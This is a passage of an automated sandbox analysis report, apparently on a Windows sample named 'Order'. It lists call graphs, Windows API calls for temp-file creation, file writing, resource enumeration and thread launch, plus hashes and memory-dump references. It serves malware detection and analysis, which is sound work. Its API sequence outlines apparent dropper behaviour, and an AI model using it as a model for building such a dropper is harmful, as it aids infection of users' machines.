4 API calls 9606->9608 9609 403d37 9607->9609 9610 403dc5 9608->9610 9671 4011de 9609->9671 9725 405170 TlsGetValue 9610->9725 9614 403dcc 9617 40df50 HeapFree 9614->9617 9615 403d5a 9695 4046ff 9615->9695 9616 403d7c 9711 40de80 GetLastError TlsGetValue SetLastError 9616->9711 9620 403de3 9617->9620 9623 40df50 HeapFree 9620->9623 9622 403d82 9712 40de80 GetLastError TlsGetValue SetLastError 9622->9712 9626 403a61 9623->9626 9626->8824 9627 403d7a 9726 40e0b0 TlsGetValue 9627->9726 9628 403d8a 9713 409cb0 9628->9713 9630 403da0 9632 40dec0 3 API calls 9630->9632 9633 403daa 9632->9633 9723 409b80 HeapFree 9633->9723 9635->8827 9636->8833 9637->8839 9638->8845 9639->8851 9640->8853 9641->8855 9642->8859 9643->8861 9803 406310 9644->9803 9646 403b28 9646->8864 9647->8867 9648->8869 9649->8871 9650->8875 9651->8877 9652->8883 9653->8885 9654->8897 9655->8899 9657 405060 2 API calls 9656->9657 9658 40241f 9657->9658 9659 405060 2 API calls 9658->9659 9660 40242c 9659->9660 9833 40acb0 9660->9833 9664 402457 9665 40a9d0 11 API calls 9664->9665 9666 402464 9665->9666 9667 40df50 HeapFree 9666->9667 9668 40248b 9667->9668 9669 40df50 HeapFree 9668->9669 9670 402494 9669->9670 9670->8902 9672 4011e6 9671->9672 9672->9672 9673 405060 2 API calls 9672->9673 9674 4011ff 9673->9674 9727 405700 9674->9727 9677 409b60 HeapSize 9678 401214 9677->9678 9679 40dbca 4 API calls 9678->9679 9680 401236 9679->9680 9681 40dbca 4 API calls 9680->9681 9682 401254 9681->9682 9683 40dbca 4 API calls 9682->9683 9684 4014ac 9683->9684 9685 40dbca 4 API calls 9684->9685 9686 4014ca 9685->9686 9734 409b80 HeapFree 9686->9734 9688 4014d3 9689 40df50 HeapFree 9688->9689 9690 4014e3 9689->9690 9691 40dd1d 2 API calls 9690->9691 9692 4014ed 9691->9692 9693 40dd1d 2 API calls 9692->9693 9694 4014f6 9693->9694 9694->9615 9694->9616 9696 40dfc0 21 API calls 9695->9696 9697 40470d 9696->9697 9698 405060 2 API calls 9697->9698 9699 404719 9698->9699 9700 40472c 9699->9700 9735 40249b 9699->9735 9709 40473d 9700->9709 9744 40acd0 9700->9744 9703 40df50 HeapFree 9704 403d71 9703->9704 9710 409b80 HeapFree 9704->9710 9705 40474f 9706 40478f 9705->9706 9705->9709 9755 40afb0 9705->9755 9708 40a9d0 11 API calls 9706->9708 9708->9709 9709->9703 9710->9627 9711->9622 9712->9628 9714 409cd0 9713->9714 9717 409d28 9713->9717 9715 40e260 3 API calls 9714->9715 9716 409cf9 9715->9716 9802 40e3f0 TlsGetValue 9716->9802 9718 409d83 MultiByteToWideChar 9717->9718 9720 40e260 3 API calls 9718->9720 9722 409da0 MultiByteToWideChar 9720->9722 9721 409d1d 9721->9630 9722->9630 9723->9601 9724->9606 9725->9614 9726->9614 9728 405710 WideCharToMultiByte 9727->9728 9729 40570b 9727->9729 9730 409ba0 RtlAllocateHeap 9728->9730 9729->9728 9731 405730 9730->9731 9732 405736 WideCharToMultiByte 9731->9732 9733 401207 9731->9733 9732->9733 9733->9677 9734->9688 9736 405060 2 API calls 9735->9736 9737 4024ac 9736->9737 9766 40ada0 9737->9766 9740 4024d3 9742 40df50 HeapFree 9740->9742 9741 40a9d0 11 API calls 9741->9740 9743 4024eb 9742->9743 9743->9700 9745 40d498 5 API calls 9744->9745 9746 40ace5 9745->9746 9747 40ad97 9746->9747 9748 40acef CreateFileW 9746->9748 9747->9705 9749 40ad10 CreateFileW 9748->9749 9750 40ad2c 9748->9750 9749->9750 9751 40ad4d 9749->9751 9750->9751 9752 40ad39 HeapAlloc 9750->9752 9753 40d40a 4 API calls 9751->9753 9754 40ad8e 9751->9754 9752->9751 9753->9754 9754->9705 9756 40afc2 9755->9756 9757 40b015 9755->9757 9758 40b00d 9756->9758 9759 40d459 2 API calls 9756->9759 9757->9706 9758->9706 9760 40afda 9759->9760 9761 40b003 9760->9761 9762 40aff2 WriteFile 9760->9762 9763 40afe4 9760->9763 9761->9706 9762->9761 9791 40b020 9763->9791 9765 40afec 9765->9706 9769 40aac0 9766->9769 9768 4024bf 9768->9740 9768->9741 9770 40aad8 9769->9770 9771 40d498 5 API calls 9770->9771 9772 40aaef 9771->9772 9773 40aca2 9772->9773 9774 40ab02 9772->9774 9775 40ab3e 9772->9775 9773->9768 9777 40ab19 9774->9777 9778 40ab1c CreateFileW 9774->9778 9776 40ab43 9775->9776 9781 40ab7c 9775->9781 9779 40ab5a 9776->9779 9780 40ab5d CreateFileW 9776->9780 9777->9778 9785 40abe8 9778->9785 9779->9780 9780->9785 9782 40aba7 CreateFileW 9781->9782 9781->9785 9784 40abc9 CreateFileW 9782->9784 9782->9785 9783 40ac70 9787 40d40a 4 API calls 9783->9787 9790 40ac81 9783->9790 9784->9785 9785->9783 9786 40ac22 9785->9786 9788 40ac0e HeapAlloc 9785->9788 9786->9783 9789 40ac5c SetFilePointer 9786->9789 9787->9773 9788->9786 9789->9783 9790->9768 9792 40b127 9791->9792 9793 40b03a 9791->9793 9792->9765 9794 40b040 SetFilePointer 9793->9794 9795 40b06b 9793->9795 9794->9795 9797 40aa40 WriteFile 9795->9797 9799 40b077 9795->9799 9796 40b0a7 9796->9765 9798 40b0ee 9797->9798 9798->9799 9800 40b0f5 WriteFile 9798->9800 9799->9796 9801 40b091 memcpy 9799->9801 9800->9765 9801->9765 9802->9721 9804 40631f 9803->9804 9805 406438 9804->9805 9816 4063ae 9804->9816 9806 40e1e0 TlsGetValue 9805->9806 9808 406442 9806->9808 9807 40660a 9807->9646 9809 40645a 9808->9809 9810 40644a _wcsdup 9808->9810 9811 40e1e0 TlsGetValue 9809->9811 9810->9809 9812 406460 9811->9812 9813 406477 9812->9813 9814 406468 _wcsdup 9812->9814 9815 40e1e0 TlsGetValue 9813->9815 9814->9813 9817 406480 9815->9817 9816->9807 9818 4063fc wcsncpy 9816->9818 9820 40642e 9816->9820 9819 406488 _wcsdup 9817->9819 9822 406498 9817->9822 9818->9816 9819->9822 9820->9646 9821 40e260 3 API calls 9823 406520 9821->9823 9822->9821 9824 406572 wcsncpy 9823->9824 9825 406526 9823->9825 9828 40658d 9823->9828 9824->9828 9826 4065e4 9825->9826 9827 4065db free 9825->9827 9829 4065f7 9826->9829 9830 4065eb free 9826->9830 9827->9826 9828->9825 9832 406625 wcsncpy 9828->9832 9829->9807 9831 4065fe free 9829->9831 9830->9829 9831->9807 9832->9828 9834 40aac0 15 API calls 9833->9834 9835 40243f 9834->9835 9835->9666 9836 40af80 9835->9836 9837 40d459 2 API calls 9836->9837 9838 40af8f 9837->9838 9839 40afa3 9838->9839 9842 40ae80 9838->9842 9839->9664 9841 40afa0 9841->9664 9843 40af74 9842->9843 9844 40ae94 9842->9844 9843->9841 9844->9843 9845 40aea8 9844->9845 9846 40af0d 9844->9846 9848 40aee0 9845->9848 9849 40aeb8 9845->9849 9860 40b130 WideCharToMultiByte 9846->9860 9848->9848 9850 40aeeb WriteFile 9848->9850 9853 40b020 4 API calls 9849->9853 9850->9841 9851 40af27 9852 40af6b 9851->9852 9854 40af37 9851->9854 9855 40af48 WriteFile 9851->9855 9852->9841 9856 40aeda 9853->9856 9857 40b020 4 API calls 9854->9857 9858 40af5c HeapFree 9855->9858 9856->9841 9859 40af42 9857->9859 9858->9852 9859->9858 9861 40b155 HeapAlloc 9860->9861 9862 40b18e 9860->9862 9863 40b189 9861->9863 9864 40b16c WideCharToMultiByte 9861->9864 9862->9851 9863->9851 9864->9863 10167->7796 10168->7798 10169->7800 10170->7802 10171->7806 10172->7812 10173->7814 10174->7816 10175->7818 10176->7822 10177->7830 10178->7836 10179->7838 10180->7845 10181->7847 10182->7849 10183->7851 10184->7855 10185->7861 10186->7863 10187->7865 10188->7867 10189->7871 10190->7877 10191->7883 10192->7889 10193->7891 10194->7897 10195->7903 10453 406289 10454 406290 10453->10454 10454->10454 10457 40e3f0 TlsGetValue 10454->10457 10456 4062b5 10457->10456 10196 40b020 10197 40b127 10196->10197 10198 40b03a 10196->10198 10199 40b040 SetFilePointer 10198->10199 10200 40b06b 10198->10200 10199->10200 10202 40aa40 WriteFile 10200->10202 10204 40b077 10200->10204 10201 40b0a7 10203 40b0ee 10202->10203 10203->10204 10205 40b0f5 WriteFile 10203->10205 10204->10201 10206 40b091 memcpy 10204->10206 10616 401f3b 10617 40dfc0 21 API calls 10616->10617 10618 401f43 10617->10618 10639 40de80 GetLastError TlsGetValue SetLastError 10618->10639 10620 401f49 10640 40de80 GetLastError TlsGetValue SetLastError 10620->10640 10622 401f5a 10623 40e020 4 API calls 10622->10623 10624 401f62 10623->10624 10641 40de80 GetLastError TlsGetValue SetLastError 10624->10641 10626 401f68 10642 40de80 GetLastError TlsGetValue SetLastError 10626->10642 10628 401f70 10643 409b10 10628->10643 10632 401f7d 10647 405182 TlsGetValue 10632->10647 10634 401f88 10635 408e27 20 API calls 10634->10635 10636 401f91 10635->10636 10637 4051a0 3 API calls 10636->10637 10638 401f96 10637->10638 10638->10638 10639->10620 10640->10622 10641->10626 10642->10628 10648 409aa0 10643->10648 10646 40e080 TlsGetValue 10646->10632 10647->10634 10649 409ab0 10648->10649 10650 40e260 3 API calls 10649->10650 10651 401f77 10650->10651 10651->10646 10207 4011bf 10234 405379 EnterCriticalSection 10207->10234 10209 4011c4 10220 409950 SetUnhandledExceptionFilter 10209->10220 10211 4011c9 10221 40a6b5 10211->10221 10217 4011d8 10233 409b30 HeapDestroy 10217->10233 10219 4011dd 10220->10211 10222 4011ce 10221->10222 10223 40a6be 10221->10223 10225 40aa90 10222->10225 10224 40d9f5 2 API calls 10223->10224 10224->10222 10226 40d9f5 2 API calls 10225->10226 10227 4011d3 10226->10227 10228 40d2c4 10227->10228 10229 40d2d1 10228->10229 10230 40d2d2 10228->10230 10229->10217 10231 40d2e7 10230->10231 10232 40d2db TlsFree 10230->10232 10231->10217 10232->10231 10233->10219 10235 4053b2 LeaveCriticalSection 10234->10235 10236 40538f 10234->10236 10235->10209 10237 405390 CloseHandle 10236->10237 10239 4053b1 10236->10239 10238 40db32 HeapFree 10237->10238 10238->10236 10239->10235

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02310000,00000000,?,?), ref: 0040E2C7
                      • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                      • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                      • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                      • String ID: GetLongPathNameW$Kernel32.DLL
                      • API String ID: 820969696-2943376620
                      • Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                      • Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
                      • Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                      • Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                      • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
                      • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
                      • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02310000,00000000,?,?), ref: 0040DF1C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                      • String ID: $pA$$pA$$pA$$pA
                      • API String ID: 368575804-1531182785
                      • Opcode ID: f2649a27bc67419c7da43eb2419df5a8acb945f1114a682675cf20ce32d935b4
                      • Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
                      • Opcode Fuzzy Hash: f2649a27bc67419c7da43eb2419df5a8acb945f1114a682675cf20ce32d935b4
                      • Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0040100F
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                        • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                        • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                        • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                        • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                        • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                        • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                        • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                        • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                      • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
                        • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
                        • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
                        • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                        • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                        • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                        • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                      • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011A5
                      • HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
                      • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
                      • String ID: .pA$:pA
                      • API String ID: 3272620648-1142403416
                      • Opcode ID: 2cb7c3423d8d5d08e17f4111cb8a79a384b104a5b6fb2f3686e5397f4b8265a8
                      • Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
                      • Opcode Fuzzy Hash: 2cb7c3423d8d5d08e17f4111cb8a79a384b104a5b6fb2f3686e5397f4b8265a8
                      • Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 145 403df3-403df4 146 403df9-403e04 145->146 146->146 147 403e06-403e1c call 40dfc0 146->147 150 403e1e-403e26 147->150 151 403e28-403e8a call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 150->151 152 403e8c-403e9d 150->152 151->150 151->152 153 403e9f-403ea7 152->153 156 403ea9-403f0b call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 153->156 157 403f0d-403f1e 153->157 156->153 156->157 160 403f20-403f28 157->160 163 403f2a-403f8c call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 160->163 164 403f8e-403f9f 160->164 163->160 163->164 168 403fa1-403fa9 164->168 172 403fab-40400d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 168->172 173 40400f-404020 168->173 172->168 172->173 178 404022-40402a 173->178 183 404090-4040a1 178->183 184 40402c-40408e call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 178->184 190 4040a3-4040ab 183->190 184->178 184->183 196 404115-404126 190->196 197 4040ad-404113 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 190->197 204 404128-404130 196->204 197->190 197->196 205 404132-404190 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 204->205 206 40419a-4041ab 204->206 323 404195-404198 205->323 215 4041ad-4041b5 206->215 224 4041b7-40421d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 215->224 225 40421f-404230 215->225 224->215 224->225 235 404232-40423a 225->235 245 4042a4-4044ef call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 403275 call 40dec0 call 40985e GetModuleHandleW call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 402e9d call 40de80 call 4021a4 call 4051a0 call 40195b call 40460e call 40de80 call 405100 call 40358d call 40dec0 PathRemoveBackslashW call 40213e call 40de80 * 2 call 402bfa call 40e080 call 405182 call 4098c0 call 4051a0 call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 401e55 call 40dec0 call 403855 call 40de80 call 40e020 call 40dec0 PathQuoteSpacesW call 40de80 call 40e020 * 3 call 40dec0 PathQuoteSpacesW 235->245 246 40423c-4042a2 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 235->246 437 4044f1-404507 call 405492 245->437 438 404509-40450d call 402ca9 245->438 246->235 246->245 323->204 323->206 441 404512-40460d call 40de80 * 2 call 40e020 * 3 call 40e080 call 40de80 * 2 call 40a7f5 call 40e080 call 40de80 call 40e020 * 2 call 405182 * 3 call 402022 call 4051a0 call 401fa9 call 40df50 * 10 437->441 438->441
                      APIs
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02310000,00000000,?,?), ref: 0040DF1C
                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02319778,00000000,00000000), ref: 004042FB
                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                        • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(02319778,02319778,00002710), ref: 00402C34
                        • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                        • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02319778,02319778,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                        • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02319778,02318DC0,00000000,00000000), ref: 00401E8A
                      • PathQuoteSpacesW.SHLWAPI(00000000,00000001,02318E40,00000000,00000000,00000000,00000000,00000000,02319778,02318DC0,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                      • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,02318E40,00000000,00000000,00000000,00000000,00000000,02319778,02318DC0), ref: 004044E1
                        • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02319778), ref: 004054AB
                        • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                        • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                        • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                        • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
